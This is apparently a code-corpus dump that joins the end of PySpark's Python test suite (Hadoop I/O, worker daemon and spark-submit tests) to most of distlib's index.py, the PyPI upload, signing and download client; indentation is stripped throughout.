ints = sorted(self.sc.sequenceFile(basepath + "/sfint/").collect())
self.assertEqual(ints, ei)
ed = [(1.0, u'aa'), (1.0, u'aa'), (2.0, u'aa'), (2.0, u'bb'), (2.0, u'bb'), (3.0, u'cc')]
self.sc.parallelize(ed).saveAsSequenceFile(basepath + "/sfdouble/")
doubles = sorted(self.sc.sequenceFile(basepath + "/sfdouble/").collect())
self.assertEqual(doubles, ed)
ebs = [(1, bytearray(b'\x00\x07spam\x08')), (2, bytearray(b'\x00\x07spam\x08'))]
self.sc.parallelize(ebs).saveAsSequenceFile(basepath + "/sfbytes/")
bytes = sorted(self.sc.sequenceFile(basepath + "/sfbytes/").collect())
self.assertEqual(bytes, ebs)
et = [(u'1', u'aa'),
(u'2', u'bb'),
(u'3', u'cc')]
self.sc.parallelize(et).saveAsSequenceFile(basepath + "/sftext/")
text = sorted(self.sc.sequenceFile(basepath + "/sftext/").collect())
self.assertEqual(text, et)
eb = [(1, False), (1, True), (2, False), (2, False), (2, True), (3, True)]
self.sc.parallelize(eb).saveAsSequenceFile(basepath + "/sfbool/")
bools = sorted(self.sc.sequenceFile(basepath + "/sfbool/").collect())
self.assertEqual(bools, eb)
en = [(1, None), (1, None), (2, None), (2, None), (2, None), (3, None)]
self.sc.parallelize(en).saveAsSequenceFile(basepath + "/sfnull/")
nulls = sorted(self.sc.sequenceFile(basepath + "/sfnull/").collect())
self.assertEqual(nulls, en)
em = [(1, {}),
(1, {3.0: u'bb'}),
(2, {1.0: u'aa'}),
(2, {1.0: u'cc'}),
(3, {2.0: u'dd'})]
self.sc.parallelize(em).saveAsSequenceFile(basepath + "/sfmap/")
maps = sorted(self.sc.sequenceFile(basepath + "/sfmap/").collect())
self.assertEqual(maps, em)
def test_oldhadoop(self):
basepath = self.tempdir.name
dict_data = [(1, {}),
(1, {"row1": 1.0}),
(2, {"row2": 2.0})]
self.sc.parallelize(dict_data).saveAsHadoopFile(
basepath + "/oldhadoop/",
"org.apache.hadoop.mapred.SequenceFileOutputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.MapWritable")
result = sorted(self.sc.hadoopFile(
basepath + "/oldhadoop/",
"org.apache.hadoop.mapred.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.MapWritable").collect())
self.assertEqual(result, dict_data)
conf = {
"mapred.output.format.class": "org.apache.hadoop.mapred.SequenceFileOutputFormat",
"mapred.output.key.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.value.class": "org.apache.hadoop.io.MapWritable",
"mapred.output.dir": basepath + "/olddataset/"
}
self.sc.parallelize(dict_data).saveAsHadoopDataset(conf)
input_conf = {"mapred.input.dir": basepath + "/olddataset/"}
old_dataset = sorted(self.sc.hadoopRDD(
"org.apache.hadoop.mapred.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.MapWritable",
conf=input_conf).collect())
self.assertEqual(old_dataset, dict_data)
def test_newhadoop(self):
basepath = self.tempdir.name
data = [(1, ""),
(1, "a"),
(2, "bcdf")]
self.sc.parallelize(data).saveAsNewAPIHadoopFile(
basepath + "/newhadoop/",
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text")
result = sorted(self.sc.newAPIHadoopFile(
basepath + "/newhadoop/",
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text").collect())
self.assertEqual(result, data)
conf = {
"mapreduce.outputformat.class":
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
"mapred.output.key.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.value.class": "org.apache.hadoop.io.Text",
"mapred.output.dir": basepath + "/newdataset/"
}
self.sc.parallelize(data).saveAsNewAPIHadoopDataset(conf)
input_conf = {"mapred.input.dir": basepath + "/newdataset/"}
new_dataset = sorted(self.sc.newAPIHadoopRDD(
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text",
conf=input_conf).collect())
self.assertEqual(new_dataset, data)
def test_newhadoop_with_array(self):
basepath = self.tempdir.name
# use custom ArrayWritable types and converters to handle arrays
array_data = [(1, array('d')),
(1, array('d', [1.0, 2.0, 3.0])),
(2, array('d', [3.0, 4.0, 5.0]))]
self.sc.parallelize(array_data).saveAsNewAPIHadoopFile(
basepath + "/newhadoop/",
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.spark.api.python.DoubleArrayWritable",
valueConverter="org.apache.spark.api.python.DoubleArrayToWritableConverter")
result = sorted(self.sc.newAPIHadoopFile(
basepath + "/newhadoop/",
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.spark.api.python.DoubleArrayWritable",
valueConverter="org.apache.spark.api.python.WritableToDoubleArrayConverter").collect())
self.assertEqual(result, array_data)
conf = {
"mapreduce.outputformat.class":
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
"mapred.output.key.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.value.class": "org.apache.spark.api.python.DoubleArrayWritable",
"mapred.output.dir": basepath + "/newdataset/"
}
self.sc.parallelize(array_data).saveAsNewAPIHadoopDataset(
conf,
valueConverter="org.apache.spark.api.python.DoubleArrayToWritableConverter")
input_conf = {"mapred.input.dir": basepath + "/newdataset/"}
new_dataset = sorted(self.sc.newAPIHadoopRDD(
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.spark.api.python.DoubleArrayWritable",
valueConverter="org.apache.spark.api.python.WritableToDoubleArrayConverter",
conf=input_conf).collect())
self.assertEqual(new_dataset, array_data)
def test_newolderror(self):
basepath = self.tempdir.name
rdd = self.sc.parallelize(range(1, 4)).map(lambda x: (x, "a" * x))
self.assertRaises(Exception, lambda: rdd.saveAsHadoopFile(
basepath + "/newolderror/saveAsHadoopFile/",
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat"))
self.assertRaises(Exception, lambda: rdd.saveAsNewAPIHadoopFile(
basepath + "/newolderror/saveAsNewAPIHadoopFile/",
"org.apache.hadoop.mapred.SequenceFileOutputFormat"))
def test_bad_inputs(self):
basepath = self.tempdir.name
rdd = self.sc.parallelize(range(1, 4)).map(lambda x: (x, "a" * x))
self.assertRaises(Exception, lambda: rdd.saveAsHadoopFile(
basepath + "/badinputs/saveAsHadoopFile/",
"org.apache.hadoop.mapred.NotValidOutputFormat"))
self.assertRaises(Exception, lambda: rdd.saveAsNewAPIHadoopFile(
basepath + "/badinputs/saveAsNewAPIHadoopFile/",
"org.apache.hadoop.mapreduce.lib.output.NotValidOutputFormat"))
def test_converters(self):
# use of custom converters
basepath = self.tempdir.name
data = [(1, {3.0: u'bb'}),
(2, {1.0: u'aa'}),
(3, {2.0: u'dd'})]
self.sc.parallelize(data).saveAsNewAPIHadoopFile(
basepath + "/converters/",
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
keyConverter="org.apache.spark.api.python.TestOutputKeyConverter",
valueConverter="org.apache.spark.api.python.TestOutputValueConverter")
converted = sorted(self.sc.sequenceFile(basepath + "/converters/").collect())
expected = [(u'1', 3.0),
(u'2', 1.0),
(u'3', 2.0)]
self.assertEqual(converted, expected)
def test_reserialization(self):
basepath = self.tempdir.name
x = range(1, 5)
y = range(1001, 1005)
data = zip(x, y)
rdd = self.sc.parallelize(x).zip(self.sc.parallelize(y))
rdd.saveAsSequenceFile(basepath + "/reserialize/sequence")
result1 = sorted(self.sc.sequenceFile(basepath + "/reserialize/sequence").collect())
self.assertEqual(result1, data)
rdd.saveAsHadoopFile(
basepath + "/reserialize/hadoop",
"org.apache.hadoop.mapred.SequenceFileOutputFormat")
result2 = sorted(self.sc.sequenceFile(basepath + "/reserialize/hadoop").collect())
self.assertEqual(result2, data)
rdd.saveAsNewAPIHadoopFile(
basepath + "/reserialize/newhadoop",
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat")
result3 = sorted(self.sc.sequenceFile(basepath + "/reserialize/newhadoop").collect())
self.assertEqual(result3, data)
conf4 = {
"mapred.output.format.class": "org.apache.hadoop.mapred.SequenceFileOutputFormat",
"mapred.output.key.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.value.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.dir": basepath + "/reserialize/dataset"}
rdd.saveAsHadoopDataset(conf4)
result4 = sorted(self.sc.sequenceFile(basepath + "/reserialize/dataset").collect())
self.assertEqual(result4, data)
conf5 = {"mapreduce.outputformat.class":
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
"mapred.output.key.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.value.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.dir": basepath + "/reserialize/newdataset"}
rdd.saveAsNewAPIHadoopDataset(conf5)
result5 = sorted(self.sc.sequenceFile(basepath + "/reserialize/newdataset").collect())
self.assertEqual(result5, data)
def test_unbatched_save_and_read(self):
basepath = self.tempdir.name
ei = [(1, u'aa'), (1, u'aa'), (2, u'aa'), (2, u'bb'), (2, u'bb'), (3, u'cc')]
self.sc.parallelize(ei, numSlices=len(ei)).saveAsSequenceFile(
basepath + "/unbatched/")
unbatched_sequence = sorted(self.sc.sequenceFile(
basepath + "/unbatched/",
batchSize=1).collect())
self.assertEqual(unbatched_sequence, ei)
unbatched_hadoopFile = sorted(self.sc.hadoopFile(
basepath + "/unbatched/",
"org.apache.hadoop.mapred.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text",
batchSize=1).collect())
self.assertEqual(unbatched_hadoopFile, ei)
unbatched_newAPIHadoopFile = sorted(self.sc.newAPIHadoopFile(
basepath + "/unbatched/",
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text",
batchSize=1).collect())
self.assertEqual(unbatched_newAPIHadoopFile, ei)
oldconf = {"mapred.input.dir": basepath + "/unbatched/"}
unbatched_hadoopRDD = sorted(self.sc.hadoopRDD(
"org.apache.hadoop.mapred.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text",
conf=oldconf,
batchSize=1).collect())
self.assertEqual(unbatched_hadoopRDD, ei)
newconf = {"mapred.input.dir": basepath + "/unbatched/"}
unbatched_newAPIHadoopRDD = sorted(self.sc.newAPIHadoopRDD(
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text",
conf=newconf,
batchSize=1).collect())
self.assertEqual(unbatched_newAPIHadoopRDD, ei)
def test_malformed_RDD(self):
basepath = self.tempdir.name
# non-batch-serialized RDD[[(K, V)]] should be rejected
data = [[(1, "a")], [(2, "aa")], [(3, "aaa")]]
rdd = self.sc.parallelize(data, numSlices=len(data))
self.assertRaises(Exception, lambda: rdd.saveAsSequenceFile(
basepath + "/malformed/sequence"))
class TestDaemon(unittest.TestCase):
def connect(self, port):
from socket import socket, AF_INET, SOCK_STREAM
sock = socket(AF_INET, SOCK_STREAM)
sock.connect(('127.0.0.1', port))
# send a split index of -1 to shutdown the worker
sock.send("\xFF\xFF\xFF\xFF")
sock.close()
return True
def do_termination_test(self, terminator):
from subprocess import Popen, PIPE
from errno import ECONNREFUSED
# start daemon
daemon_path = os.path.join(os.path.dirname(__file__), "daemon.py")
daemon = Popen([sys.executable, daemon_path], stdin=PIPE, stdout=PIPE)
# read the port number
port = read_int(daemon.stdout)
# daemon should accept connections
self.assertTrue(self.connect(port))
# request shutdown
terminator(daemon)
time.sleep(1)
# daemon should no longer accept connections
try:
self.connect(port)
except EnvironmentError as exception:
self.assertEqual(exception.errno, ECONNREFUSED)
else:
self.fail("Expected EnvironmentError to be raised")
def test_termination_stdin(self):
"""Ensure that daemon and workers terminate when stdin is closed."""
self.do_termination_test(lambda daemon: daemon.stdin.close())
def test_termination_sigterm(self):
"""Ensure that daemon and workers terminate on SIGTERM."""
from signal import SIGTERM
self.do_termination_test(lambda daemon: os.kill(daemon.pid, SIGTERM))
class TestWorker(PySparkTestCase):
def test_cancel_task(self):
temp = tempfile.NamedTemporaryFile(delete=True)
temp.close()
path = temp.name
def sleep(x):
import os
import time
with open(path, 'w') as f:
f.write("%d %d" % (os.getppid(), os.getpid()))
time.sleep(100)
# start job in background thread
def run():
self.sc.parallelize(range(1)).foreach(sleep)
import threading
t = threading.Thread(target=run)
t.daemon = True
t.start()
daemon_pid, worker_pid = 0, 0
while True:
if os.path.exists(path):
data = open(path).read().split(' ')
daemon_pid, worker_pid = map(int, data)
break
time.sleep(0.1)
# cancel jobs
self.sc.cancelAllJobs()
t.join()
for i in range(50):
try:
os.kill(worker_pid, 0)
time.sleep(0.1)
except OSError:
break # worker was killed
else:
self.fail("worker has not been killed after 5 seconds")
try:
os.kill(daemon_pid, 0)
except OSError:
self.fail("daemon had been killed")
# run a normal job
rdd = self.sc.parallelize(range(100), 1)
self.assertEqual(100, rdd.map(str).count())
def test_fd_leak(self):
N = 1100 # fd limit is 1024 by default
rdd = self.sc.parallelize(range(N), N)
self.assertEquals(N, rdd.count())
def test_after_exception(self):
def raise_exception(_):
raise Exception()
rdd = self.sc.parallelize(range(100), 1)
self.assertRaises(Exception, lambda: rdd.foreach(raise_exception))
self.assertEqual(100, rdd.map(str).count())
def test_after_jvm_exception(self):
tempFile = tempfile.NamedTemporaryFile(delete=False)
tempFile.write("Hello World!")
tempFile.close()
data = self.sc.textFile(tempFile.name, 1)
filtered_data = data.filter(lambda x: True)
self.assertEqual(1, filtered_data.count())
os.unlink(tempFile.name)
self.assertRaises(Exception, lambda: filtered_data.count())
rdd = self.sc.parallelize(range(100), 1)
self.assertEqual(100, rdd.map(str).count())
def test_accumulator_when_reuse_worker(self):
from pyspark.accumulators import INT_ACCUMULATOR_PARAM
acc1 = self.sc.accumulator(0, INT_ACCUMULATOR_PARAM)
self.sc.parallelize(range(100), 20).foreach(lambda x: acc1.add(x))
self.assertEqual(sum(range(100)), acc1.value)
acc2 = self.sc.accumulator(0, INT_ACCUMULATOR_PARAM)
self.sc.parallelize(range(100), 20).foreach(lambda x: acc2.add(x))
self.assertEqual(sum(range(100)), acc2.value)
self.assertEqual(sum(range(100)), acc1.value)
class TestSparkSubmit(unittest.TestCase):
def setUp(self):
self.programDir = tempfile.mkdtemp()
self.sparkSubmit = os.path.join(os.environ.get("SPARK_HOME"), "bin", "spark-submit")
def tearDown(self):
shutil.rmtree(self.programDir)
def createTempFile(self, name, content):
"""
Create a temp file with the given name and content and return its path.
Strips leading spaces from content up to the first '|' in each line.
"""
pattern = re.compile(r'^ *\|', re.MULTILINE)
content = re.sub(pattern, '', content.strip())
path = os.path.join(self.programDir, name)
with open(path, "w") as f:
f.write(content)
return path
def createFileInZip(self, name, content):
"""
Create a zip archive containing a file with the given content and return its path.
Strips leading spaces from content up to the first '|' in each line.
"""
pattern = re.compile(r'^ *\|', re.MULTILINE)
content = re.sub(pattern, '', content.strip())
path = os.path.join(self.programDir, name + ".zip")
zip = zipfile.ZipFile(path, 'w')
zip.writestr(name, content)
zip.close()
return path
def test_single_script(self):
"""Submit and test a single script file"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|
|sc = SparkContext()
|print sc.parallelize([1, 2, 3]).map(lambda x: x * 2).collect()
""")
proc = subprocess.Popen([self.sparkSubmit, script], stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[2, 4, 6]", out)
def test_script_with_local_functions(self):
"""Submit and test a single script file calling a global function"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|
|def foo(x):
| return x * 3
|
|sc = SparkContext()
|print sc.parallelize([1, 2, 3]).map(foo).collect()
""")
proc = subprocess.Popen([self.sparkSubmit, script], stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[3, 6, 9]", out)
def test_module_dependency(self):
"""Submit and test a script with a dependency on another module"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|from mylib import myfunc
|
|sc = SparkContext()
|print sc.parallelize([1, 2, 3]).map(myfunc).collect()
""")
zip = self.createFileInZip("mylib.py", """
|def myfunc(x):
| return x + 1
""")
proc = subprocess.Popen([self.sparkSubmit, "--py-files", zip, script],
stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[2, 3, 4]", out)
def test_module_dependency_on_cluster(self):
"""Submit and test a script with a dependency on another module on a cluster"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|from mylib import myfunc
|
|sc = SparkContext()
|print sc.parallelize([1, 2, 3]).map(myfunc).collect()
""")
zip = self.createFileInZip("mylib.py", """
|def myfunc(x):
| return x + 1
""")
proc = subprocess.Popen([self.sparkSubmit, "--py-files", zip, "--master",
"local-cluster[1,1,512]", script],
stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[2, 3, 4]", out)
def test_single_script_on_cluster(self):
"""Submit and test a single script on a cluster"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|
|def foo(x):
| return x * 2
|
|sc = SparkContext()
|print sc.parallelize([1, 2, 3]).map(foo).collect()
""")
proc = subprocess.Popen(
[self.sparkSubmit, "--master", "local-cluster[1,1,512]", script],
stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[2, 4, 6]", out)
class ContextStopTests(unittest.TestCase):
def test_stop(self):
sc = SparkContext()
self.assertNotEqual(SparkContext._active_spark_context, None)
sc.stop()
self.assertEqual(SparkContext._active_spark_context, None)
def test_with(self):
with SparkContext() as sc:
self.assertNotEqual(SparkContext._active_spark_context, None)
self.assertEqual(SparkContext._active_spark_context, None)
def test_with_exception(self):
try:
with SparkContext() as sc:
self.assertNotEqual(SparkContext._active_spark_context, None)
raise Exception()
except:
pass
self.assertEqual(SparkContext._active_spark_context, None)
def test_with_stop(self):
with SparkContext() as sc:
self.assertNotEqual(SparkContext._active_spark_context, None)
sc.stop()
self.assertEqual(SparkContext._active_spark_context, None)
@unittest.skipIf(not _have_scipy, "SciPy not installed")
class SciPyTests(PySparkTestCase):
"""General PySpark tests that depend on scipy """
def test_serialize(self):
from scipy.special import gammaln
x = range(1, 5)
expected = map(gammaln, x)
observed = self.sc.parallelize(x).map(gammaln).collect()
self.assertEqual(expected, observed)
@unittest.skipIf(not _have_numpy, "NumPy not installed")
class NumPyTests(PySparkTestCase):
"""General PySpark tests that depend on numpy """
def test_statcounter_array(self):
x = self.sc.parallelize([np.array([1.0, 1.0]), np.array([2.0, 2.0]), np.array([3.0, 3.0])])
s = x.stats()
self.assertSequenceEqual([2.0, 2.0], s.mean().tolist())
self.assertSequenceEqual([1.0, 1.0], s.min().tolist())
self.assertSequenceEqual([3.0, 3.0], s.max().tolist())
self.assertSequenceEqual([1.0, 1.0], s.sampleStdev().tolist())
if __name__ == "__main__":
if not _have_scipy:
print "NOTE: Skipping SciPy tests as it does not seem to be installed"
if not _have_numpy:
print "NOTE: Skipping NumPy tests as it does not seem to be installed"
unittest.main()
if not _have_scipy:
print "NOTE: SciPy tests were skipped as it does not seem to be installed"
if not _have_numpy:
print "NOTE: NumPy tests were skipped as it does not seem to be installed"
|
index.py
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2013 Vinay Sajip.
# Licensed to the Python Software Foundation under a contributor agreement.
# See LICENSE.txt and CONTRIBUTORS.txt.
#
import hashlib
import logging
import os
import shutil
import subprocess
import tempfile
try:
from threading import Thread
except ImportError:
from dummy_threading import Thread
from . import DistlibException
from .compat import (HTTPBasicAuthHandler, Request, HTTPPasswordMgr,
urlparse, build_opener, string_types)
from .util import zip_dir, ServerProxy
logger = logging.getLogger(__name__)
DEFAULT_INDEX = 'https://pypi.org/pypi'
DEFAULT_REALM = 'pypi'
class PackageIndex(object):
"""
This class represents a package index compatible with PyPI, the Python
Package Index.
"""
boundary = b'----------ThIs_Is_tHe_distlib_index_bouNdaRY_$'
def __init__(self, url=None):
"""
Initialise an instance.
:param url: The URL of the index. If not specified, the URL for PyPI is
used.
"""
self.url = url or DEFAULT_INDEX
self.read_configuration()
scheme, netloc, path, params, query, frag = urlparse(self.url)
if params or query or frag or scheme not in ('http', 'https'):
raise DistlibException('invalid repository: %s' % self.url)
self.password_handler = None
self.ssl_verifier = None
self.gpg = None
self.gpg_home = None
with open(os.devnull, 'w') as sink:
# Use gpg by default rather than gpg2, as gpg2 insists on
# prompting for passwords
for s in ('gpg', 'gpg2'):
try:
rc = subprocess.check_call([s, '--version'], stdout=sink,
stderr=sink)
if rc == 0:
self.gpg = s
break
except OSError:
pass
def _get_pypirc_command(self):
"""
Get the distutils command for interacting with PyPI configurations.
:return: the command.
"""
from .util import _get_pypirc_command as cmd
return cmd()
def read_configuration(self):
"""
Read the PyPI access configuration as supported by distutils. This populates
``username``, ``password``, ``realm`` and ``url`` attributes from the
configuration.
"""
from .util import _load_pypirc
cfg = _load_pypirc(self)
self.username = cfg.get('username')
self.password = cfg.get('password')
self.realm = cfg.get('realm', 'pypi')
self.url = cfg.get('repository', self.url)
def save_configuration(self):
"""
Save the PyPI access configuration. You must have set ``username`` and
``password`` attributes before calling this method.
"""
self.check_credentials()
from .util import _store_pypirc
_store_pypirc(self)
def check_credentials(self):
"""
Check that ``username`` and ``password`` have been set, and raise an
exception if not.
"""
if self.username is None or self.password is None:
raise DistlibException('username and password must be set')
pm = HTTPPasswordMgr()
_, netloc, _, _, _, _ = urlparse(self.url)
pm.add_password(self.realm, netloc, self.username, self.password)
self.password_handler = HTTPBasicAuthHandler(pm)
def register(self, metadata):
"""
Register a distribution on PyPI, using the provided metadata.
:param metadata: A :class:`Metadata` instance defining at least a name
and version number for the distribution to be
registered.
:return: The HTTP response received from PyPI upon submission of the
request.
"""
self.check_credentials()
metadata.validate()
d = metadata.todict()
d[':action'] = 'verify'
request = self.encode_request(d.items(), [])
response = self.send_request(request)
d[':action'] = 'submit'
request = self.encode_request(d.items(), [])
return self.send_request(request)
def _reader(self, name, stream, outbuf):
"""
Thread runner for reading lines of from a subprocess into a buffer.
:param name: The logical name of the stream (used for logging only).
:param stream: The stream to read from. This will typically a pipe
connected to the output stream of a subprocess.
:param outbuf: The list to append the read lines to.
"""
while True:
s = stream.readline()
if not s:
break
s = s.decode('utf-8').rstrip()
outbuf.append(s)
logger.debug('%s: %s' % (name, s))
stream.close()
def get_sign_command(self, filename, signer, sign_password,
keystore=None):
"""
Return a suitable command for signing a file.
:param filename: The pathname to the file to be signed.
:param signer: The identifier of the signer of the file.
:param sign_password: The passphrase for the signer's
private key used for signing.
:param keystore: The path to a directory which contains the keys
used in verification. If not specified, the
instance's ``gpg_home`` attribute is used instead.
:return: The signing command as a list suitable to be
passed to :class:`subprocess.Popen`.
"""
cmd = [self.gpg, '--status-fd', '2', '--no-tty']
if keystore is None:
keystore = self.gpg_home
if keystore:
cmd.extend(['--homedir', keystore])
if sign_password is not None:
cmd.extend(['--batch', '--passphrase-fd', '0'])
td = tempfile.mkdtemp()
sf = os.path.join(td, os.path.basename(filename) + '.asc')
cmd.extend(['--detach-sign', '--armor', '--local-user',
signer, '--output', sf, filename])
logger.debug('invoking: %s', ' '.join(cmd))
return cmd, sf
def run_command(self, cmd, input_data=None):
"""
Run a command in a child process , passing it any input data specified.
:param cmd: The command to run.
:param input_data: If specified, this must be a byte string containing
data to be sent to the child process.
:return: A tuple consisting of the subprocess' exit code, a list of
lines read from the subprocess' ``stdout``, and a list of
lines read from the subprocess' ``stderr``.
"""
kwargs = {
'stdout': subprocess.PIPE,
'stderr': subprocess.PIPE,
}
if input_data is not None:
kwargs['stdin'] = subprocess.PIPE
stdout = []
stderr = []
p = subprocess.Popen(cmd, **kwargs)
# We don't use communicate() here because we may need to
# get clever with interacting with the command
t1 = Thread(target=self._reader, args=('stdout', p.stdout, stdout))
t1.start()
t2 = Thread(target=self._reader, args=('stderr', p.stderr, stderr))
t2.start()
if input_data is not None:
p.stdin.write(input_data)
p.stdin.close()
p.wait()
t1.join()
t2.join()
return p.returncode, stdout, stderr
def sign_file(self, filename, signer, sign_password, keystore=None):
"""
Sign a file.
:param filename: The pathname to the file to be signed.
:param signer: The identifier of the signer of the file.
:param sign_password: The passphrase for the signer's
private key used for signing.
:param keystore: The path to a directory which contains the keys
used in signing. If not specified, the instance's
``gpg_home`` attribute is used instead.
:return: The absolute pathname of the file where the signature is
stored.
"""
cmd, sig_file = self.get_sign_command(filename, signer, sign_password,
keystore)
rc, stdout, stderr = self.run_command(cmd,
sign_password.encode('utf-8'))
if rc != 0:
raise DistlibException('sign command failed with error '
'code %s' % rc)
return sig_file
def upload_file(self, metadata, filename, signer=None, sign_password=None,
filetype='sdist', pyversion='source', keystore=None):
"""
Upload a release file to the index.
:param metadata: A :class:`Metadata` instance defining at least a name
and version number for the file to be uploaded.
:param filename: The pathname of the file to be uploaded.
:param signer: The identifier of the signer of the file.
:param sign_password: The passphrase for the signer's
private key used for signing.
:param filetype: The type of the file being uploaded. This is the
distutils command which produced that file, e.g.
``sdist`` or ``bdist_wheel``.
:param pyversion: The version of Python which the release relates
to. For code compatible with any Python, this would
be ``source``, otherwise it would be e.g. ``3.2``.
:param keystore: The path to a directory which contains the keys
used in signing. If not specified, the instance's
``gpg_home`` attribute is used instead.
:return: The HTTP response received from PyPI upon submission of the
request.
"""
self.check_credentials()
if not os.path.exists(filename):
raise DistlibException('not found: %s' % filename)
metadata.validate()
d = metadata.todict()
sig_file = None
if signer:
if not self.gpg:
logger.warning('no signing program available - not signed')
else:
sig_file = self.sign_file(filename, signer, sign_password,
keystore)
with open(filename, 'rb') as f:
file_data = f.read()
md5_digest = hashlib.md5(file_data).hexdigest()
sha256_digest = hashlib.sha256(file_data).hexdigest()
d.update({
':action': 'file_upload',
'protocol_version': '1',
'filetype': filetype,
'pyversion': pyversion,
'md5_digest': md5_digest,
'sha256_digest': sha256_digest,
})
files = [('content', os.path.basename(filename), file_data)]
if sig_file:
with open(sig_file, 'rb') as f:
sig_data = f.read()
files.append(('gpg_signature', os.path.basename(sig_file),
sig_data))
shutil.rmtree(os.path.dirname(sig_file))
request = self.encode_request(d.items(), files)
return self.send_request(request)
def upload_documentation(self, metadata, doc_dir):
"""
Upload documentation to the index.
:param metadata: A :class:`Metadata` instance defining at least a name
and version number for the documentation to be
uploaded.
:param doc_dir: The pathname of the directory which contains the
documentation. This should be the directory that
contains the ``index.templates`` for the documentation.
:return: The HTTP response received from PyPI upon submission of the
request.
"""
self.check_credentials()
if not os.path.isdir(doc_dir):
raise DistlibException('not a directory: %r' % doc_dir)
fn = os.path.join(doc_dir, 'index.templates')
if not os.path.exists(fn):
raise DistlibException('not found: %r' % fn)
metadata.validate()
name, version = metadata.name, metadata.version
zip_data = zip_dir(doc_dir).getvalue()
fields = [(':action', 'doc_upload'),
('name', name), ('version', version)]
files = [('content', name, zip_data)]
request = self.encode_request(fields, files)
return self.send_request(request)
def get_verify_command(self, signature_filename, data_filename,
keystore=None):
"""
Return a suitable command for verifying a file.
:param signature_filename: The pathname to the file containing the
signature.
:param data_filename: The pathname to the file containing the
signed data.
:param keystore: The path to a directory which contains the keys
used in verification. If not specified, the
instance's ``gpg_home`` attribute is used instead.
:return: The verifying command as a list suitable to be
passed to :class:`subprocess.Popen`.
"""
cmd = [self.gpg, '--status-fd', '2', '--no-tty']
if keystore is None:
keystore = self.gpg_home
if keystore:
cmd.extend(['--homedir', keystore])
cmd.extend(['--verify', signature_filename, data_filename])
logger.debug('invoking: %s', ' '.join(cmd))
return cmd
def verify_signature(self, signature_filename, data_filename,
keystore=None):
"""
Verify a signature for a file.
:param signature_filename: The pathname to the file containing the
signature.
:param data_filename: The pathname to the file containing the
signed data.
:param keystore: The path to a directory which contains the keys
used in verification. If not specified, the
instance's ``gpg_home`` attribute is used instead.
:return: True if the signature was verified, else False.
"""
if not self.gpg:
raise DistlibException('verification unavailable because gpg '
'unavailable')
cmd = self.get_verify_command(signature_filename, data_filename,
keystore)
rc, stdout, stderr = self.run_command(cmd)
if rc not in (0, 1):
raise DistlibException('verify command failed with error '
'code %s' % rc)
return rc == 0
def download_file(self, url, destfile, digest=None, reporthook=None):
"""
This is a convenience method for downloading a file from an URL.
Normally, this will be a file from the index, though currently
no check is made for this (i.e. a file can be downloaded from
anywhere).
The method is just like the :func:`urlretrieve` function in the
standard library, except that it allows digest computation to be
done during download and checking that the downloaded data
matched any expected value.
:param url: The URL of the file to be downloaded (assumed to be
available via an HTTP GET request).
:param destfile: The pathname where the downloaded file is to be
saved.
:param digest: If specified, this must be a (hasher, value)
tuple, where hasher is the algorithm used (e.g.
``'md5'``) and ``value`` is the expected value.
:param reporthook: The same as for :func:`urlretrieve` in the
standard library.
"""
if digest is None:
digester = None
logger.debug('No digest specified')
else:
if isinstance(digest, (list, tuple)):
hasher, digest = digest
else:
hasher = 'md5'
digester = getattr(hashlib, hasher)()
logger.debug('Digest specified: %s' % digest)
# The following code is equivalent to urlretrieve.
# We need to do it this way so that we can compute the
# digest of the file as we go.
with open(destfile, 'wb') as dfp:
# addinfourl is not a context manager on 2.x
# so we have to use try/finally
sfp = self.send_request(Request(url))
try:
headers = sfp.info()
blocksize = 8192
size = -1
read = 0
blocknum = 0
if "content-length" in headers:
size = int(headers["Content-Length"])
